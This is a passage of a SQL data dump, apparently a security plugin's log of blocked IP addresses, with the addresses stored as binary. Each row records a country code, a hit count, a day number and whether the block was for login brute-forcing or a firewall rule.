��','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��+���','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�Ԟ','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�T�','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�FK','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��+�','HK',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��,�h�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��- 9','SC',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��- 9','SC',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��- 9','SC',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(�)','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-(��','US',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��-7<n','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',3,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-=��','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��->�o','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��-@6�','HK',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-M��','AU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��-P�0','TR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-]��','IR',2,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��-]��','IR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-v�W','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wQ�','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wS�','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wT�','VN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-wU�','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-|T(','VN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-|T(','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-|T(','VN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�S#','DE',5,18876,'waf'),('\0\0\0\0\0\0\0\0\0\0��-�k�','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','MD',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�49','RU',1,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�M^','IR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','TR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-�A*','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','BR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','BR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��-��','BR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��.|','RU',1,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0��.ePS','GB',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��.ePS','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e_A','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e_A','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e_A','GB',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e_A','GB',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��.est','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�\"','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��.e�\"','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�yo','UA',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��.�`S','DE',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��.��','BY',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��.��','BY',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��/4�*','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/4�*','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��/J�','JP',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/[+�','AU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��/aP3','CN',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/d�?','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��/i=#','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jv�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/jɆ','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/k!\Z','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/k!\Z','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/r�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��/sM�','CN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��/','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��/','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�\'','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��/��','SG',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�=�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��/� ','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��/� ','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��/� ','CN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��/�','CN',3,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��/���','MY',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��1\"��','IN',27,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��1���','AU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��1��E','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��2&�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��2tb','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��2tb','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3\rH�','NO',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3\rH�','NO',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��3\rH�','NO',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��3','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3&�','FR',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��3&�','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3&��','FR',3,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��3D(','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3D(','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3D(','FR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dp^','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Dx�','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KR','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3KR','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O4','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O>','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O','CA',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O��','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O��','SG',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3QJ','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3QQ\n','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�$','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�x','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�x','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Q�x','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3S�\n','PL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��3S�\n','PL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Y��','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��3[{�','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��3[{�','FR',3,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��3[{�','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',4,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�8�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�]','CA',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��3�\"o','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��3','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��3��3','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��3���','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��3ðP','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��3ðP','FR',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��3ðP','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��3���','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��3҉','FR',15,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�\"','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��4BB','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��4N�}','KR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�@�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��4���','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�w%','SG',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�w%','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�w%','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��4��~','SG',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�:m','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�:m','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��4ʎ�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��4֪','IE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6$��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6%','GB',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��6%','GB',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��6%','GB',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&.�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��6&I�','FR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'�','CA',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'1�','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��6\'iX','CA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��p','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�e!','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�\"p','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�Y�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��-','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��6��-','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��:��^','HK',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��=C�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��=��','VN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��=��','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��=��','VN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��=��','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��=/(3','TH',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��=o�$','KR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��=�F�','HK',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','PT',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��>K�','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>z�&','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��>���','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��G','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�Rt','FR',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�a','FR',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�a','FR',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�ra','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�ra','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�zJ','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҵ�','FR',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҵ�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҵ�','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�d�','IR',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��?��','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��?���','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��?���','US',2,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��?���','US',4,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��?���','US',2,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',2,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��?�)','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��@%4','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@%4','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@%4','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z(d','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z(d','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��@[�L','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��@om�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��@o~ ','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�D�','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�5?','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�5?','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�5?','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�:�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�I�','NL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�I�','NL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�I�','NL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�N�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��@��','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��A})','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<\n�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��A<\n�','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bt�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�S','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�l','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�l','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',3,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��B!�~','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��B*>k','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Bs�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�h','US',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��B�h','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��B��','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��C�